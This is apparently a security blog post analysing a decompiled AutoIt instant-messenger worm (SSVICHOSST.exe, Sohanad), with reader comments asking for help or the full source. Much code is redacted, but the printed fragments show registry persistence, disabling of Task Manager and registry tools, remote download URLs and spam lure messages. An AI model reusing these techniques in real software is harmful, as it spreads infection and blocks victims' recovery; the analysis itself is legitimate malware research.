Complete detail about SSVICHOSST.exe IM-Worm.Win32.Sohanad.t

File Name : SSVICHOSST.exe
Virus          : IM-Worm.Win32.Sohanad.t
The virus program was written in software “AutoIt”.
And it has been decompiled by the same software’s decompiler, “Exe2Aut v3”.
I don’t know whether anyone else has done this or not, here is the decompiled virus program:

*******************
*******************
; <AUT2EXE VERSION: 3.2.2.0>

; —————————————————————————-
; <AUT2EXE INCLUDE-START: C:\Documents and Settings\phuong anh\Desktop\nhatquanglan.au3>
; —————————————————————————-

;Written by Nhatquanglan
;contact
nhatquanglan@gmail.com

; —————————————————————————-
; <AUT2EXE INCLUDE-START: C:\Program Files\AutoIt3\Include\Process.au3>
; —————————————————————————-

; Include Version:1.59  (04/20/2006)
; ——————————————————————————
;
; AutoIt Version: 3.0
; Language:       English
; Description:    Functions that assist with process management.
;
; —————————————————————–
;==============================================;
; Description –   Returns a string containing the process name that

belongs to a given PID.
; Syntax –        _ProcessGetName( $iPID )
; Parameters –    $iPID – The PID of a currently running process
; Requirements –  None.
; Return Values – Success – The name of the process
;                 Failure – Blank string and sets @error
;                       1 – Process doesn’t exist
;                       2 – Error getting process list
;                       3 – No processes found
; Author(s) –     Erifash <erifash [at] gmail [dot] com>, Wouter van Kesteren.
; Notes –         Supplementary to ProcessExists().
;===========================

xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonxxxxxxxxx

;===========================;
; Function Name:    _ProcessGetPriority()
; Description:      Get the  priority of an open process
; Parameter(s):     $vProcess      – PID or name of a process.
; Requirement(s):   AutoIt Beta v3.1.1.61+
;                   kernel32.dll (included with Windows)
; Return Value(s):  On Success – Returns integer corressponding to
;                   the processes’s priority:
;                     0 – Idle/Low
;                     1 – Below Normal (Not supported on Windows 95/98/ME)
;                     2 – Normal
;                     3 – Above Normal (Not supported on Windows 95/98/ME)
;                     4 – High
;                     5 – Realtime
; On Failure:       Returns -1 and sets @Error to 1
; Author(s):        Matthew Tucker
;                   Valik added Pid or Processname logic
;================;

xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonxxxxxxxx
;================;
; Description:      Executes a DOS command in a hidden command window.
; Syntax:           _RunDOS( $sCommand )
; Parameter(s):     $sCommand – Command to execute
; Requirement(s):   None
; Return Value(s):  On Success – Returns the exit code of the command
;                   On Failure – Depends on RunErrorsFatal setting
; Author(s):        Jeremy Landes <jlandes at landeserve dot com>
; Note(s):          None
;
;================ 

xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonxxxxxxxxx

; —————————————————————————-
; <AUT2EXE INCLUDE-END: C:\Program Files\AutoIt3\Include\Process.au3>
; —————————————————————————-
#NoTrayIcon
$name = “SSVICHOSST”
$setting = “setting”
$ini = “.ini”
$nql = “.nql”
$xls = “.xls”
$exe = “.exe”
$toigioupdate = @HOUR + 2
$toigio = @MIN + 30
xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonsxxxxxxxxxxxxxxRegWrite (“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon”,”Shell”,”REG_SZ”,”Explorer.exe ” &

$name & $exe)

RegWrite (“HKEY_CURRENT_USER\Software\Microsoft\Windows\

CurrentVersion\Run”,“Yahoo Messengger”,”REG_SZ”,@SystemDir & “\” & $name & $exe)RegWrite (“HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Policies\Explorer”

,”NofolderOptions”,”REG_DWORD”,1)
RegWrite (“HKEY_CURRENT_USER\Software\Microsoft\Windows\

CurrentVersion\Policies\System”, “DisableTaskMgr”, “REG_DWORD”,1)
RegWrite (“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\

Policies\System”, “DisableRegistryTools”, “REG_DWORD”,1)
RegWrite (“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\

Schedule”,”AtTaskMaxHours”,”REG_DWORD”,0)

xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonsxxxxxxxxx

(“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\

Explorer\WorkgroupCrawler\Shares”,”shared”)

xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonsxxxxxxxx

Func downloadurl()
 $settingurl=”http://nhatquanglan3.t35.com

xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonsxxxxxxxxx

 $downloaded=”success”
 $settingurl1 = “
http://nhatquanglan4.t35.com
 

xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonsxxxxxxxxx 

  $myweb = “http://nhatquanglan1.0catch.com

xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonsxxxxxxxxxx

  $tin[1] = “Vao day nghe bai nay di ban ” & $myweb & ” ”
 EndIf
 $tin[2] = IniRead (@SystemDir & “\” & $setting & $ini,”setting”,”tin[2]”,””)
 If $tin[2] = “” Then
   $tin[2] = “Vao day nghe bai nay di ban ” & $myweb & ” ”
 EndIf
 $tin[3] = IniRead (@SystemDir & “\” & $setting & $ini,”setting”,”tin[3]”,””)
 If $tin[3] = “” Then
  $tin[3] = “Biet tin gi chua, vao day coi di ” & $myweb & ” ”
 EndIf
 $tin[4] = IniRead (@SystemDir & “\” & $setting & $ini,”setting”,”tin[4]”,””)
 If $tin[4] = “” Then
  $tin[4] = “Trang Web nay coi cung hay, vao coi thu di ” & $myweb & ” ”
 EndIf
 $tin[5] = IniRead (@SystemDir & “\” & $setting & $ini,”setting”,”tin[5]”,””)
 If $tin[5] = “” Then
  $tin[5] = “Toi di lang thang lan trong bong toi buot gia, ve dau khi da mat em roi?

 Ve dau khi bao nhieu mo mong gio da vo tan… Ve dau toi biet di ve dau?  ” &$myweb &”  ”
 EndIf
 $tin[6] = IniRead (@SystemDir & “\” & $setting & $ini,”setting”,”tin[6]”,””)
 If $tin[6] = “” Then
  $tin[6] = “Khoc cho nho thuong voi trong long, khoc cho noi sau nhe nhu khong. Bao nhieu yeu thuong nhung ngay qua da tan theo khoi may bay that xa… ” & $myweb & ” ”
 EndIf
 $tin[7] = IniRead (@SystemDir & “\” & $setting & $ini,”setting”,”tin[7]”,””)
 If $tin[7] = “” Then
  $tin[7] = “Tha nguoi dung noi se yeu minh toi mai thoi thi gio day toi se vui hon. Gio nguoi lac loi buoc chan ve noi xa xoi, cay dang chi rieng minh toi… ” & $myweb & ” ”
 EndIf
 $tin[8] = IniRead (@SystemDir & “\” & $setting & $ini,”setting”,”tin[8]”,””)
 If $tin[8] = “” Then
  $tin[8] = “Loi em noi cho tinh chung ta, nhu doan cuoi trong cuon phim buon. Nguoi da den nhu la giac mo roi ra di cho anh bat ngo… ” & $myweb & ” ”
 EndIf
 $tin[9] = IniRead (@SystemDir & “\” & $setting & $ini,”setting”,”tin[9]”,””)
 If $tin[9] = “” Then
  $tin[9] = “Tra lai em niem vui khi duoc gan ben em, tra lai em loi yeu thuong em dem, tra lai em niem tin thang nam qua ta dap xay. Gio day chi la nhung ky niem buon… ” & $myweb & ” ”
 EndIf
 $tieude = WinGetTitle(“Yahoo! Messenger”, “”)
 

xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonsxxxxxxxxxx

 If WinExists (“Bkav2006”) Then

xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonsxxxxxxxxx


 If WinExists (“System Configuration”) Then
xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonsxxxxxxxxxxxxxx If WinExists (“Registry”) Then
xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonsxxxxxxxxxxxxxx
 If WinExists (“Windows Task”) Then
xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonsxxxxxxxxxxxxxx
 If WinExists (“[FireLion]”) Then
xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonsxxxxxxxxx
 If ProcessExists (“cmd.exe”) then
 
xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonsxxxxxxxxx

(“HKEY_CURRENT_USER\Software\Microsoft\Windows\

CurrentVersion\Explorer\WorkgroupCrawler\Shares”,$i)

xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonsxxxxxxxxxx

(“HKEY_CURRENT_USER\Software\Microsoft\Windows\

CurrentVersion\Explorer\

xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonsxxxxxxxx

xxxxxxxxxxxxx virus code deleted by piyushlabs for security reasonsxxxxxxxxx

; —————————————————————————-
; <AUT2EXE INCLUDE-END: C:\Documents and Settings\phuong anh\Desktop\nhatquanglan.au3>
; —————————————————————————-
*******************
*******************
OBSERVATIONS:
————-

Here you can clearly see:

#; <AUT2EXE INCLUDE-START: C:\Documents and Settings\phuong anh\Desktop\nhatquanglan.au3>
>phuong anh is probably the name of the virus writer.

#;Written by Nhatquanglan
>Probably his nick name, or something else.

#;contact nhatquanglan@gmail.com
>His email id, ofcourse u can’t be sure of.

#”http://nhatquanglan4.t35.com
#”http://nhatquanglan4.t35.com
#”http://nhatquanglan1.0catch.com
>His websites.
#
E may, vao day coi co con nho nay ngon lam
Vao day nghe bai nay di ban
Vao day nghe bai nay di ban
Biet tin gi chua, vao day coi di
Trang Web nay coi cung hay, vao coi thu di
Toi di lang thang lan trong bong toi buot gia, ve dau khi da mat em roi? Ve dau khi bao nhieu mo mong gio da vo tan… Ve dau toi biet di ve dau?
Khoc cho nho thuong voi trong long, khoc cho noi sau nhe nhu khong. Bao nhieu yeu thuong nhung ngay qua da tan theo khoi may bay that xa…
Tha nguoi dung noi se yeu minh toi mai thoi thi gio day toi se vui hon. Gio nguoi lac loi buoc chan ve noi xa xoi, cay dang chi rieng minh toi…
Loi em noi cho tinh chung ta, nhu doan cuoi trong cuon phim buon. Nguoi da den nhu la giac mo roi ra di cho anh bat ngo…
Tra lai em niem vui khi duoc gan ben em, tra lai em loi yeu thuong em dem, tra lai em niem tin thang nam qua ta dap xay. Gio day chi la nhung ky niem buon…
>The strings in the program

#Toi di lang thang lan trong bong toi buot gia, ve dau khi da mat em roi? Ve dau khi bao nhieu mo mong gio da vo tan… Ve dau toi biet di ve dau?
#Biet tin gi chua, vao day coi di
>Matches with the spam caused in chatting softwares caused by Nhatquanglan virus with many varients like SCVHSOT.exe, scvshosts.exe, SCVVHSOT.exe
It means the Nhatquanglan virus with many varients is most probably written by the same person.
But the new virus files can’t be decompiled, because now he uses a password kind of thing in AutoIt programs called “Passphrase”. Clever… Unless you have the password, you can’t decompile.

17 Responses to “Complete detail about SSVICHOSST.exe IM-Worm.Win32.Sohanad.t”

  1. Gurpreet Says:

    suffering gorm this virus can you help

  2. venkatmani Says:

    my system affected ssvichosst.exe virus .i am using win98 os

  3. piyushlabs Says:

    GURPREET
    VENKATMANI
    visit this page for the manual solution
    https://piyushlabs.wordpress.com/ssvichosst/

    and u download and run the heal form here
    https://piyushlabs.wordpress.com/downloads/

  4. gurjeet Says:

    it not only spams chatting software… but i got a version which spams the command lines of many of my programs like auto cad, 3ds max and causes photshop to shut down….. is it a new manifestation?

  5. piyushlabs Says:

    GURJEET
    yup, may be new nhatquanglan varient,
    n they can affect any program.
    can u mail me that particular virus (exe file),
    if u can get it..

  6. vicky Says:

    hi…am vicky.my system was affected with
    ssvichosst.exe and i was using avg anti spyware
    the virus was dectected & deleted but still my system booting is slow and search result of not fiding
    the file always appearing everytime i switch on
    the system….does deletion of file made any
    trouble?plz help….

  7. piyushlabs Says:

    vicky
    how does the error look like can u send me the screenshot.
    try m heal for ssvichosst.

  8. Vilas Unawane Says:

    My system is already affected by it.Need simple
    downloadble solution.Tried Trend micro scan lp$vpn163 but

  9. mark Says:

    Bro can you send me to whole decrypted virus. I have that virus but its upgraded version i think so decompile without paraphrase will not work.

  10. Sheahad Says:

    Thank you for the help.

  11. ken Says:

    thank you very much ….ur download worked for me
    thank you ….I would be glad if u could find a solution against a virus named blok.exe and trojan named …planet[1] planet[2] and so on …many times they travel in cognizance with ssvichosst.exe

  12. mario Says:

    hey if you can email me the passphrace to decompile the virus .

    im studiying programming plz help me.
    i like this virus script plz accept my favour.

    OR if you can email me the .au3 script plz

  13. Vikram Madan Says:

    Hi Piyush.

    My PC has a new variant of this ssvichosst. Your downloadable solution is not working on this one.

    What to do? If you tell me what file to send you, I will mail it to you.

    Thanks.

  14. JONATHAN Says:

    Sir
    I will like to learn how to program m that virus and the solution to it

  15. CrisP Says:

    Hi,

    Can you tell us how to get the codes from an AutoIt 3? Can you unpack other packed files that uses Version 3.2.2.0? Thanks!

  16. Jasmine Says:

    Hi, when I start up the laptop, I get a tab which is named vse432 Properties. And then there’s a cycle of non-stop Windows Explorer Has Stopped working error…and everything else errors as well with the messages.

    I was wondering if this is the virus infecting the system? I tried to run the patch but it’s not working…I suspect the step which is not working is when I double click on the shortcut.

    Can you please advice? :\

  17. quesss...woy Says:

    wow…very nice we can easy slwe this problem..i like this

Comments are closed.


%d bloggers like this: